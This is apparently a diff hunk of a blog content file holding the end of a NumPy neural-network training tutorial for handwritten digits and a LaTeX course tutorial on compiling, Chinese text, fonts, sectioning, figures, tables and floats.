    $$dB^{[1]} = \frac{1}{m} \Sigma {dZ^{[1]}}$$

def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2

Update the parameters

Update the parameters with learning rate alpha:

    $$W^{[2]} := W^{[2]} - \alpha dW^{[2]}$$
    $$b^{[2]} := b^{[2]} - \alpha db^{[2]}$$
    $$W^{[1]} := W^{[1]} - \alpha dW^{[1]}$$
    $$b^{[1]} := b^{[1]} - \alpha db^{[1]}$$

def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2

Make predictions

numpy.argmax() returns the index of the largest element along the given axis; the most probable class is taken as the final prediction.

def get_predictions(A2):
    return np.argmax(A2, 0)

Compute the accuracy

def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size  # accuracy = number correct / total

Gradient descent

def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params()  # initialize the parameters
    for i in range(iterations):
        Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X)  # forward propagation
        dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y)  # backpropagation
        W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha)  # update
        if i % 10 == 0:  # report the accuracy every 10 iterations
            print("Iteration:", i)
            predictions = get_predictions(A2)
            print("Accuracy:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2

Train the neural network

The resulting accuracy and the learned network parameters:

    W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
Iteration: 0  [2 2 9 ... 9 2 2] [6 1 2 ... 5 3 1]  Accuracy: 0.13534146341463416
Iteration: 10  [2 6 9 ... 3 6 2] [6 1 2 ... 5 3 1]  Accuracy: 0.2577560975609756
Iteration: 20  [2 6 9 ... 3 1 2] [6 1 2 ... 5 3 1]  Accuracy: 0.3676341463414634
Iteration: 30  [2 6 9 ... 3 1 1] [6 1 2 ... 5 3 1]  Accuracy: 0.4432439024390244
Iteration: 40  [2 1 9 ... 3 1 1] [6 1 2 ... 5 3 1]  Accuracy: 0.495390243902439
Iteration: 50  [2 1 8 ... 3 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.5352682926829269
Iteration: 60  [2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.568390243902439
Iteration: 70  [2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.5975609756097561
Iteration: 80  [2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.6207317073170732
Iteration: 90  [2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.6396829268292683
Iteration: 100  [2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.6570243902439025
Iteration: 110  [2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.672829268292683
Iteration: 120  [2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.6867560975609757
Iteration: 130  [2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]  Accuracy: 0.6998048780487804
Iteration: 140  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.710390243902439
Iteration: 150  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7207560975609756
Iteration: 160  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7307560975609756
Iteration: 170  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7396829268292683
Iteration: 180  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7484634146341463
Iteration: 190  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7559512195121951
Iteration: 200  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7630975609756098
Iteration: 210  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7700731707317073
Iteration: 220  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7764878048780488
Iteration: 230  [2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7819024390243903
Iteration: 240  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7870731707317074
Iteration: 250  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7922926829268293
Iteration: 260  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.7969512195121952
Iteration: 270  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8013414634146342
Iteration: 280  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.805439024390244
Iteration: 290  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8083414634146342
Iteration: 300  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8113658536585366
Iteration: 310  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8147560975609756
Iteration: 320  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.818
Iteration: 330  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8207073170731707
Iteration: 340  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8234634146341463
Iteration: 350  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8260975609756097
Iteration: 360  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8283170731707317
Iteration: 370  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8308292682926829
Iteration: 380  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8332682926829268
Iteration: 390  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8349512195121951
Iteration: 400  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8371463414634146
Iteration: 410  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8391463414634146
Iteration: 420  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8407073170731707
Iteration: 430  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8424146341463414
Iteration: 440  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8438780487804878
Iteration: 450  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.845390243902439
Iteration: 460  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8467317073170731
Iteration: 470  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8479756097560975
Iteration: 480  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.848780487804878
Iteration: 490  [4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]  Accuracy: 0.8501219512195122

The final accuracy is 85.01%.

Visualize the training results

Use the trained model to make predictions

def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions

def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray()  # set the matplotlib colormap to "gray"
    plt.imshow(current_image, interpolation='nearest')
    plt.show()

    Let’s look at a couple of examples:

    test_prediction(0, W1, b1, W2, b2)
    test_prediction(1, W1, b1, W2, b2)
    test_prediction(2, W1, b1, W2, b2)
    test_prediction(3, W1, b1, W2, b2)
Prediction:  [1]
Label:  1

    png

Prediction:  [1]
Label:  1

    png

Prediction:  [6]
Label:  6

    png

Prediction:  [1]
Label:  1

    png

Apply the trained model to the validation set

    dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
    get_accuracy(dev_predictions, Y_dev)
    [6 3 3 4 3 5 9 2 2 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 0 6 8 4 6 4 1 1 0 8 3 1 8 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 6 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 9 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 5 8 6 2 3 2 5 0 6 7 5 4 1 2 9 3 2 6 6 9 5 6 2 1 2 7 3 4 3 2 6 5 2 5 2 6 1 8 1 7 4 8 4 1 2 2 0 1 8 1 5 2 6 8 5 7 8 1 0 0 0 9 2 7 5 6 5 6 9 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 8 9 0 3 6 5 8 6 8 1 3 7 5 5 7 9 1 9 8 1 6 0 3 0 8 9 1 1 7 9 4 1 9 3 3 1 6 0 2 8 2 4 6 8 1 0 9 6 3 3 2 6 1 4 0 8 2 7 0 2 2 1 2 7 3 1 1 2 2 8 9 5 1 3 9 7 2 4 4 4 3 7 3 8 2 7 8 1 5 9 7 5 5 1 3 1 9 4 7 7 9 4 1 4 7 9 2 9 3 1 2 7 7 0 3 3 8 7 5 6 7 9 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 8 4 1 6 3 2 9 6 2 4 3 7 3 6 6 4 5 1 2 0 9 1 5 5 6 9 5 8 5 6 8 9 0 9 8 6 0 7 8 0 5 0 3 2 3 3 9 4 1 4 6 6 9 6 1 3 3 3 0 6 5 8 0 1 6 5 6 1 8 9 8 0 2 1 3 3 9 9 6 2 9 8 2 3 6 5 6 9 7 0 7 4 8 3 4 9 9 4 3 2 0 2 4 5 8 9 9 5 0 7 3 0 4 9 1 2 1 7 7 6 2 2 0 6 1 9 8 8 0 0 1 9 3 9 8 4 8 8 1 4 2 0 1 3 5 1 8 8 3 9 7 1 1 2 6 2 6 1 7 1 2 5 8 0 3 0 9 5 8 9 0 0 8 1 9 3 1 4 4 4 9 7 2 8 1 5 5 8 5 4 4 1 8 5 6 1 1 9 2 8 3 7 5 7 4 9 4 3 6 7 9 0 8 0 1 7 2 8 7 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 5 5 7 2 3 0 1 7 1 2 8 0 8 0 6 6 6 6 6 4 5 5 8 0 1 3 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 2 3 1 3 8 1 4 4 7 9 9 9 6 0 5 9 9 6 9 6 4 3 1 1 0 0 5 9 6 4 1 0 1 7 9 9 1 1 1 4 4 3 8 2 1 0 8 5 0 9 0 2 8 5 2 0 3 7 6 3 0 4 3 9 2 5 2 3 2 4 4 6 7 1 6 7 1 7 0 3 7 3 6 2 8 2 1 6 4 1 5 8 6 8 7 5 1 6 8 3 1 8 2 9 1 8 6 7 0 4 2 6 8 9 7 2 8 6 4 2 6 3 8 5 1 8 3 3 0 1 4 1 0 9 1 7 3 6 0 4 2 1 7 1 0 0 0 2 0 9 7 9 8 4 3 6 6 9 0 5 8 5 0 6 3 1 9 2 5 2 7 4 8 6 7 7 9 3 9 4 3 6 3 5 2 1 4 5 5 9 6 5 1 8 5 2 2 2 0 5 8 6 2 7 7 5 2 4 0 2 6 4 2 4 7 9 8 3 6 0 2 8 9 4 6 6 8 7 2 2 7 2 0 2 9 5 2 1 3 7 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 8 2 9 6 5 4 9 3 7 8 1 8 4 7 7 0 2 3 5 5 7 5 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 7 6 0 1 4 6 4 3 8 4 2 6 1 0 4 7 3 0 7 2 5 5 1 8 6 4 6 1 0 6 6 1 8 1 3 9 9 8 0 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 1] [6 3 3 4 3 5 9 2 9 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 2 6 8 2 6 4 1 1 0 8 3 1 2 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 0 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 4 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 0 8 6 4 3 3 5 0 6 7 5 4 1 2 4 3 2 6 6 9 5 6 2 1 2 7 3 8 9 2 6 5 2 5 2 6 1 9 1 7 4 8 4 1 5 2 0 1 8 1 3 2 5 8 5 7 5 1 0 0 0 9 2 7 5 6 9 6 7 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 5 9 0 3 6 5 3 6 8 1 3 9 5 5 7 4 1 4 5 8 6 0 3 0 5 9 1 7 9 3 4 7 9 3 3 1 6 0 2 5 2 4 0 8 1 2 9 6 3 8 2 6 1 9 0 8 3 7 0 8 2 1 2 7 3 1 1 2 2 8 7 5 1 3 9 7 3 4 4 4 3 7 8 8 7 7 3 1 5 9 7 5 5 1 3 1 9 4 7 2 9 4 1 4 7 9 2 9 3 1 2 7 7 0 9 8 8 7 5 6 7 5 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 4 4 1 6 3 6 4 6 2 4 8 7 3 6 6 2 5 1 2 0 4 3 3 5 6 9 5 8 5 6 8 9 8 9 8 6 5 7 9 0 5 0 8 2 3 9 4 4 1 4 6 6 9 6 1 3 3 3 0 6 5 3 0 1 4 5 6 1 7 9 8 6 2 1 3 3 9 9 8 7 9 8 4 3 6 5 6 9 7 0 3 9 8 3 4 9 9 4 3 2 0 3 4 5 8 9 9 0 0 7 5 0 4 8 1 2 1 7 7 6 2 2 0 6 1 9 5 5 0 4 8 4 5 9 2 4 8 8 5 4 2 0 1 1 5 1 8 8 3 9 7 1 1 8 6 2 6 1 9 1 3 5 8 6 3 0 9 5 2 9 0 0 8 1 9 3 1 4 4 6 9 7 2 8 1 5 5 8 5 4 4 2 1 5 6 1 1 9 2 8 3 7 5 6 4 9 4 3 6 7 9 0 8 0 1 7 2 8 9 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 7 5 7 2 3 0 1 7 1 2 8 0 8 0 6 2 6 5 6 4 5 5 8 0 1 5 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 6 5 1 3 8 1 4 4 7 8 9 9 6 0 5 9 9 6 9 8 4 9 1 1 0 0 5 9 6 4 1 7 1 7 7 9 1 1 1 4 5 3 8 4 1 0 8 5 0 9 0 6 8 8 2 0 3 7 6 3 0 4 3 9 3 5 7 3 3 4 4 6 7 1 6 7 1 7 0 3 7 3 6 1 2 2 1 6 4 1 5 8 5 8 7 5 5 6 8 3 1 8 6 8 1 8 6 7 0 4 2 6 8 7 7 2 8 6 4 3 6 3 8 5 1 8 3 3 0 1 4 1 0 7 1 7 3 6 0 4 
3 1 7 1 0 0 0 2 0 9 7 4 8 4 3 8 6 4 0 5 8 5 0 6 3 1 9 2 5 9 7 4 5 6 7 2 9 3 9 4 3 6 6 5 9 1 4 5 5 9 2 5 1 8 5 2 2 2 0 3 5 6 2 7 7 5 7 9 0 2 6 8 8 4 7 9 8 5 6 0 6 8 7 4 8 6 9 7 2 2 7 2 0 2 9 5 1 1 3 4 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 9 2 9 6 5 4 4 7 7 8 1 8 4 7 7 0 8 3 5 5 7 3 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 8 6 0 1 4 2 4 3 8 4 2 6 1 0 4 7 3 0 3 2 5 0 1 8 6 4 6 1 0 6 6 1 8 1 5 9 9 8 2 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 8]
0.845

    Still 84% accuracy, so our model generalized from the training data pretty well.

    ]]>
@@ -8581,7 +8581,7 @@ /posts/Latex-latex%E4%B8%AD%E6%96%87%E6%95%99%E7%A8%8B-%E8%A5%BF%E5%8C%97%E5%86%9C%E6%9E%97%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6-%E8%80%BF%E6%A5%A0/ - Resources

Course

P1_latex01 - Installing and configuring the LaTeX environment

Installation

Install only $\TeX\ Live$; do not mix it with $Mik\TeX$ or similar distributions!

$C\TeX$ itself bundles $Mik\TeX$.

Compiling

Create a file test.tex with the following content:

    \documentclass{article}

    \begin{document}

    Hello \LaTeX

    \end{document}

In the TERMINAL, run latex test.tex to compile test.tex:

    PS D:\Study\0th-year-master\LateX\20230109> latex test.tex
    This is pdfTeX, Version 3.14159265-2.6-1.40.16 (MiKTeX 2.9)
    (test.tex
    LaTeX2e <2016/03/31>
    Babel <3.9q> and hyphenation patterns for 1 language(s) loaded.
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))

    No file test.aux.
    [1] (test.aux) )
    Output written on test.dvi (1 page, 300 bytes).
    Transcript written on test.log.

This produces a test.dvi file; next run dvipdfmx test.dvi to generate test.pdf:

    PS D:\Study\0th-year-master\LateX\20230109> dvipdfmx test.dvi
    test.dvi -> test.pdf
    [1]
    2875 bytes written

Alternatively, run xelatex test.tex to compile test.tex directly to test.pdf:

    PS D:\Study\0th-year-master\LateX\20230109> xelatex test.tex
    This is XeTeX, Version 3.14159265-2.6-0.99992 (MiKTeX 2.9)
    entering extended mode
    (test.tex
    LaTeX2e <2018-04-01> patch level 5
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\article.cls"
    Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
    ("C:\Users\gzjzx\AppData\Local\Programs\MiKTeX 2.9\tex/latex\base\size10.clo"))
    (test.aux) [1] (test.aux) )
    Output written on test.pdf (1 page).
    Transcript written on test.log.

You can also write a batch file build.bat to do all of this:

    latex test.tex
    dvipdfmx test.dvi
    del *.aux *.dvi *.log

    xelatex test.tex
    del *.aux *.dvi *.log

Then simply run build in the TERMINAL to compile.

In VS Code you can compile directly with Ctrl+Alt+B.

Producing Chinese text

First make sure the tex file is encoded in utf-8.

Load the ctex package with \usepackage{ctex} to support Chinese.

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    你好, \LaTeX

    \end{document}

Using TeXstudio

P2_latex02 - Basic structure of a LaTeX source file

% preamble
\documentclass{article} % book, report, letter
    \title{My First Document}
    \author{Nan Geng}
    \date{\today}
% body (main text)
    \begin{document}
    \maketitle
    Hello World!

    % here is my big formula.
    Let $f(x)$ be defined by the formula
    $$f(x)=3x^2+x-1$$ which is a polynomial of degree 2.
    \end{document}

A source file is divided into a preamble and a body.

    png

P3_latex03 - Handling Chinese in LaTeX

Handling Chinese

Make sure the compiler is XeLaTeX and the file encoding is UTF-8.

In the preamble, use

\documentclass{article}

\usepackage{ctex}

or

\documentclass{ctexart}

to support Chinese.

% preamble
\documentclass{ctexart} % book, report, letter

    % \usepackage{ctex}

    \newcommand\degree{^\circ}

    \title{\heiti 杂谈勾股定理}
    \author{张三}
    \date{\today}
% body (main text)
    \begin{document}
    \maketitle

    勾股定理可以用现代语言表述如下:

    直角三角形斜边的平方等于两腰的平方和。

    可以用符号语言表述为:设直角三角形 $ABC$,其中 $\angle
    C=90\degree$,则有:
\begin{equation} % produces a numbered display equation
    AB^2 = BC^2 + AC^2.
    \end{equation}
    \end{document}
• Define \degree in the preamble with \newcommand\degree{^\circ}; otherwise compilation fails.
• Use \begin{equation} and \end{equation} to produce numbered display equations.

Viewing the documentation

In the TERMINAL, run texdoc ctex:

png

Run texdoc lshort-zh:

    png

P4_latex04 - Font and font size settings in LaTeX

Font attributes

In $\LaTeX$, a font has 5 attributes:

• Font encoding

  • Text encodings: OT1, T1, EU1, etc.
  • Math encodings: OML, OMS, OMX, etc.
• Font family

  • Roman Family \textrm: strokes have serifs
  • Sans Serif Family \textsf: strokes have no serifs
  • Typewriter Family \texttt: every character has the same width (monospaced)
• Font series

  • weight
  • width
• Font shape

  • Upright Shape
  • Italic Shape
  • Slanted Shape
  • Small Caps Shape
• Font size

Setting the font family

Mind each modifier and its scope:

% font family settings (Roman Family, Sans Serif Family, Typewriter Family)
    \textrm{Roman Family}
    \textsf{Sans Serif Family}
    \texttt{Typewriter Family}

    \rmfamily Roman Family
    {\sffamily Sans Serif Family}
    {\ttfamily Typewriter Family}

    {\sffamily who you are? you find self on everyone around.
    take you as the same as others!}

    {\ttfamily Are you wiser than others?
    definitely no. insome ways, may it is true.
    what can you achieve? aluxurious house?
    a brillilant car? an admirable career?who knows? }

Setting the font series (weight and width)

% font series settings (weight and width)
    \textmd{Medium Series} \textbf{Boldface Series}

    {\mdseries Medium Series} {\bfseries Boldface Series}

Font shape (upright, italic, slanted, small caps)

    \textup{Upright Shape}
    \textit{Italic Shape}
    \textsl{Slanted Shape}
    \textsc{Small Caps Shape}

{\upshape Upright Shape}
{\itshape Italic Shape}
{\slshape Slanted Shape}
{\scshape Small Caps Shape}

Chinese fonts

% Chinese fonts
    {\songti 宋体}
    {\heiti 黑体}
    {\fangsong 仿宋}
    {\kaishu 楷书}

    中文字体的\textbf{粗体}是{\heiti 黑体},\textit{斜体}是{\kaishu 楷体}。

Font size

% font sizes
    {\tiny Hello}\\
    {\scriptsize Hello}\\
    {\footnotesize Hello}\\
    {\small Hello}\\
    {\normalsize Hello}\\
    {\large Hello}\\
    {\Large Hello}\\
    {\LARGE Hello}\\
    {\huge Hello}\\
    {\Huge Hello}\\

Chinese font size command

% Chinese font size command
    \zihao{-0} 你好!

Custom font commands

Piling up modifiers goes against the spirit of $\LaTeX$; use \newcommand to define your own font commands.

In the preamble:

    \newcommand{\myfont}{\textbf{\textsf{Fancy Text}}}

Every \myfont in the body will then be replaced by \textbf{\textsf{Fancy Text}}:

% use the custom font command
    \myfont

P5_latex05 - Basic structure of a LaTeX document

Sectioning

In the body, use \section{} to outline the document and divide it into sections; \subsection{} and \subsubsection{} subdivide further.

    \documentclass{article}

    \usepackage{ctex}

    \begin{document}

    \section{引言}
    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}

Configuring the format

\documentclass{ctexart} changes the formatting, and this formatting can be configured yourself.

Set the format in the preamble. Separating content from format is the basic idea of $\LaTeX$.

    \documentclass{ctexart}
% ======= heading format settings ========
\ctexset{
% configure section
section={
name={,、},
number={\chinese{section}},
format=\heiti\raggedright\zihao{-4}, % section headings: heiti, ragged right (left-aligned), size small-4
aftername=\hspace{0pt},
beforeskip=1ex,
afterskip=1ex
},
% configure subsection
subsection={
name={,、},
number={\arabic{subsection}},
format=\heiti\zihao{5}, % subsection headings: heiti, size 5
aftername=\hspace{0pt},
beforeskip=1ex,
afterskip=1ex
}
}

    \begin{document}

    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \subsubsection{实验条件}
    \subsubsection{实验过程}
    \section{结论}
    \section{致谢}

    \end{document}
• A blank line or \par starts a new paragraph
• \\ breaks the line but does not start a new paragraph

Generating a table of contents

Use \documentclass{ctexbook} with \tableofcontents to generate a table of contents.

    \documentclass[UTF8,a4paper,15pt,titlepage,oneside]{ctexbook}

    \begin{document}
    \tableofcontents
    \chapter{绪论}
    \section{引言}
    近年来,随着逆向工程和三维重建技术的发展和应用,
    获取现实世界中物体的三维数据的方法越来越多的关注和研究,
    很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    近年来,随着逆向工程和三维重建技术的发展和应用,\\
    获取现实世界中物体的三维数据的方法越来越多的关注和研究。
    \par 很多研究机构和商业公司都陆续推出了自己的三维重建系统。

    \section{实验方法}
    \section{实验结果}
    \subsection{数据}
    \subsection{图表}
    \section{结论}
    \section{致谢}

    \end{document}

P6_latex06 - Special characters in LaTeX

• Special characters
  • Whitespace
    • A blank line starts a new paragraph; multiple blank lines count as one
    • Indentation is automatic; never fake it with spaces
    • Runs of spaces in English text collapse to one space; spaces in Chinese text are ignored
    • Spacing between Chinese characters and other characters is handled automatically by XeLaTeX
    • Never use full-width Chinese spaces
  • $\LaTeX$ control characters
  • Typesetting symbols
  • $\TeX$ logos
  • Quotation marks
  • Hyphens and dashes
  • Non-English characters
  • Accents (using o as an example)
    \documentclass{article}

    \usepackage{ctex}
    \usepackage{xltxtra}
    \usepackage{texnames}
    \usepackage{mflogo}

    \begin{document}

    \section{空白符号}
% 1em (the width of M in the current font)
a\quad b

% 2em
a\qquad b

% about 1/6 em
a\,b a\thinspace b

% 0.5 em
a\enspace b

% normal space
a\ b

% non-breaking space
a~b

% 1pc = 12pt = 4.2188mm
a\kern 1pc b

a\kern -1em b % may be negative

a\hskip 1em b

a\hspace{35pt}b

% placeholder width
a\hphantom{xyz}b

% stretchable length
a\hfill b

\section{\LaTeX 控制符}
\# \$ \% \{ \} \~{} \_{} \^{} \textbackslash \&

    \section{排版符号}
    \S \P \dag \ddag \copyright \pounds

    \section{\TeX 标志符号}
% basic logos
\TeX{} \LaTeX{} \LaTeXe{}

% provided by the xltxtra package
\XeLaTeX

% provided by the texnames package
\AmSTeX{} \AmS-\LaTeX{}
\BibTeX{} \LuaTeX{}

% provided by the mflogo package
\METAFONT{} \MF{} \MP{}

    \section{引号}
    `'``''``你好''

    \section{连字符}
    - -- ---

    \section{非英文字符}
    \oe \OE \ae \AE \aa \AA \o \O \l \L \ss \SS !`?`

    \section{重音符号(以 o 为例)}
\`o \'o \^o \"o \~o \=o \.o \u{o} \v{o} \H{o} \r{o} \t{o} \b{o} \c{o} \d{o}

    \end{document}

P7_latex07 - Inserting figures in LaTeX

• Use \usepackage{graphicx} for figures

• Syntax: \includegraphics[<options>]{<file name>}

  • Options include:

    • scale=0.3 scale by a factor of 0.3
    • height=2cm height 2cm
    • width=2cm width 2cm
    • height=0.1\textheight 0.1 times the text height
    • width=0.2\textwidth 0.2 times the text width
    • angle=-45, width=0.2\textwidth rotate 45° clockwise at 0.2 times the text width

    Run texdoc graphicx in the terminal for the documentation.

  • The file extension may be included or omitted

• Supported formats: EPS, PDF, PNG, JPEG, BMP

    png

    \documentclass{ctexart}
    \usepackage{graphicx}
\graphicspath{{figures/}, {pics/}} % images are in the figures/ or pics/ subdirectory of the current directory

    \begin{document}
    \LaTeX{}中的插图:

    \includegraphics[scale=0.3]{lion}
    \end{document}

    png

P8_latex08 - Tables in LaTeX

\begin{tabular}[<vertical alignment>]{<column format>}
<entry> & <entry> & ... & <entry> \\
\end{tabular}

• \\ ends a row
• & separates columns
• Column format specifiers:
  • l left-align this column
  • c center this column
  • r right-align this column
  • p{<width>} fixed column width with automatic line breaking
    \documentclass{ctexart}

    \begin{document}
    \begin{tabular}{|l|c|c|c|p{1.5cm}|}
    \hline \hline
    姓名 & 语文 & 数学 & 外语 & 备注 \\
    \hline
    张三 & 87 & 100 & 93 & 优秀 \\
    \hline
    李四 & 75 & 64 & 52 & 补考另行通知 \\
    \hline
    王二 & 80 & 82 & 78 & \\
    \hline
    \end{tabular}
    \end{document}

P9_latex09 - Floats in LaTeX

To manage figures and tables flexibly, you also need float environments, namely the figure environment and the table environment.


Floats:

• allow flexible page breaking (avoiding the gaps that unbreakable content would leave)
• let you attach captions to figures and tables
• enable cross-references

The figure environment (the table environment is analogous)

\begin{figure}[<placement>]
<any content>
\end{figure}

The <placement> parameter (default tbp):

• h, here: at the position of the code in the text
• t, top: at the top of the code's page or a later page
• b, bottom: at the bottom of the code's page or a later page
• p, page: on a separate float page

Caption control (caption, bicaption, and similar packages)

Side-by-side figures and subfigures (subcaption, subfig, floatrow, and similar packages)

Text wrap-around (picinpar, wrapfig, and similar packages)


Cross-reference with \ref{} and \label{}; two compilation passes are usually needed for the references to resolve.


    \documentclass{ctexart}
    \usepackage{graphicx}
    \graphicspath{{figures/}}

    \begin{document}

    \LaTeX{}中\TeX 系统的吉祥物---小狮子见图\ref{fig-lion}。

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{lion}
    \caption{\TeX 系统的吉祥物---小狮子}\label{fig-lion}
    \end{figure}

    遥看太白,看积雪皑皑,别有一番风景(图\ref{fig-mountain})

    \begin{figure}[htbp]
    \centering
    \includegraphics[scale=0.3]{mountain}
    \caption{太白山}\label{fig-mountain}
    \end{figure}

    当然,在\LaTeX{}中也可以使用表\ref{tab-score}所示的表格。

